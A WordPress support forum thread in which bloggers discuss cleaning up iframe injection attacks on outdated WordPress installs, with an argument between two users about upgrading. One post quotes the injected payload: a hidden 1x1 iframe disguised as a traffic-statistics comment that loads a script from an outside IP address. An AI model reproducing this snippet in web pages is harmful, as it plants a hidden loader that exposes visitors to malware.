WordPress.org

Ready to get started?Download WordPress

Forums

iFrame Injection still an issue (14 posts)

  1. DocShadow
    Member
    Posted 5 years ago #

    I just finished cleaning up the results of iFrame injection attack that occurred with WP version 2.5.1

    I discovered the problem while going to update to 2.6, so hopefully the issue has been resolved. However, for everyone out there who has not upgraded, or for anyone who wants to make sure they have not been compromised:

    Your blog has a cool search feature. Being that almost every iframe injection will be inside a post, you can simply search "iframe" in the manage tab and it will find it. Searching by hand is time consuming, let smarter robots work for you ;)

    Also, be sure to change your admin password if you do find a problem, in case it is less injection and more hacked admin account.

  2. photomill
    Member
    Posted 5 years ago #

    I too have had this problem! I have posted on this site and have e-mailed the WordPress people directly (which is what they say to do if there's a security issue) and have never had any response! The most recent attack inserted the following into a post on my site:

    <!-- Traffic Statistics --> <iframe src="http://61.155.8.157/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

    How can this be resolved? Google keeps blocking my site as a distributor of badware.

  3. whooami
    Member
    Posted 5 years ago #

    http://wordpress.org/support/topic/173519?replies=1

    and you posted about this 3 months ago. If you dont know what you are doing, and cannot in three months time, locate instructions, why are you continuing to struggle. PAY someone to do what you obviously cannot.

  4. photomill
    Member
    Posted 5 years ago #

    Thanks for the help. People come here for help and this is your response? Don't be part of the problem. So much for a sense of community.

  5. whooami
    Member
    Posted 5 years ago #

    photomill, I provided excellent advice - take it or leave it. Youve seemingly spent months with the same recurring problem, and youre scoffing because someone suggests you locate someone that knows MORE than you, and throw some change at them to fix something you appear unable to manage?

    How long would you leave your car up on blocks while you struggled with a transmission repair, before you would get a mechanic?

    I hadn't even looked closely enough at your post history, before -- I thought it had been an issue for three months (which is bad enough) but looking again, your first post here, 5 months ago, suggests a problem.
    Maybe you dont seem to realize that hacked sites, compromised sites, of ANY kind, are detrimental to the larger WWW -- that includes me, that includes everyone you share your hosting with. That you cant, or wont, do whatever it takes to secure your site from continuing OR repeated attacks/exploits/etc..doesnt just adversely affect you.

  6. whooami
    Member
    Posted 5 years ago #

    I went through you few posts in your history here.

    Is this your blog?
    http://www.goutdevie.com/?page_id=130

    Because I have to tell you that if you want to try and call me out on having a "sense of community" perhaps you need a swift kick in the *** on "personal responsibility".

    <meta name="generator" content="WordPress 2.2">

    Assuming that IS your blog, as you seem to indicate in this thread, you need to upgrade, and until you do -- The issue is with you, not me.

    Here is the second best advice you can get:

    http://codex.wordpress.org/Upgrading_WordPress

  7. photomill
    Member
    Posted 5 years ago #

    Now that last bit was actually helpful advice. I appreciate that.

    I don't live to blog. I don't build websites. So no, I don't spend all the time in the word on this stuff. But damn - all I did was ask a simple question. You calling me incapable is not a polite way to convey your opinion to someone. Perhaps something simpler such as "maybe you should hire someone to help". No need to be a **** and tell me I need a kick in the ***. Seriously.

  8. whooami
    Member
    Posted 5 years ago #

    WHY do people INSIST on reading things that do NOT exist? The ONLY occurance of the word "incapable" (prior to this usage) is yours.

    I said you dont know what you are doing - and you dont. Your blog isnt upgraded, its been exploited and exploitable for months. Im calling a spade a spade.

    You do not have to "live to blog", you dont have to "build websites" but you ought to accept the fact that having a web site, especially having a web site that relies on PHP to serve dynamic content IS a responsibility. And im sorry, if you dont like that -- thats just the way it is. You either accept that fact, deal with it, and do the right thing, or you enlist paid or unpaid help, or you suffer the consequences of inaction, or lack of the "right" action, like you are now, with your site.

    You may not like hearing all of this, and Im not going to sugarcoat it for you. I will NOT placate, appease, or enable persons that continue to use insecure versions of WordPress, for ANY REASON. There is NO excuse.

    Its not personal.

  9. photomill
    Member
    Posted 5 years ago #

    "Pay someone to do what you obviously can't" isn't calling someone incapable? You're right - I need to upgrade. Could have said that from the get go.

  10. whooami
    Member
    Posted 5 years ago #

    You're right - I need to upgrade. Could have said that from the get go.

    and how would you expect me to know that? Did you provide a link to your blog in any of your posts in this thread? No. Did you indicate what version of WP you happen to be using? No. (I could really insert a smart ass remark here, but I wont.)

    You want to "read into" stuff thats not here, you have it. If the shoe fits... Go. Go forth, prove me wrong. Please.

  11. photomill
    Member
    Posted 5 years ago #

    Look, I said thanks for your help already. Isn't that enough? No more time for this. I don't have the leisure of being a student.

  12. whooami
    Member
    Posted 5 years ago #

    then. dont. reply.

  13. Anonymous
    Unregistered
    Posted 5 years ago #

    photomill is was right of you to notify WP directly as an <iframe> injection is really a matter of the source code not filtering/escaping incoming data properly and that should be fixed ASAP.

    That being said, whenever you encounter a security flaw or a bug, the first thing you should do is upgrade, quite often that will solve the problem.

  14. photomill
    Member
    Posted 5 years ago #

    Thanks Hockey! I appreciate that. I'm in the process of upgrading now.

Topic Closed

This topic has been closed to new replies.

About this Topic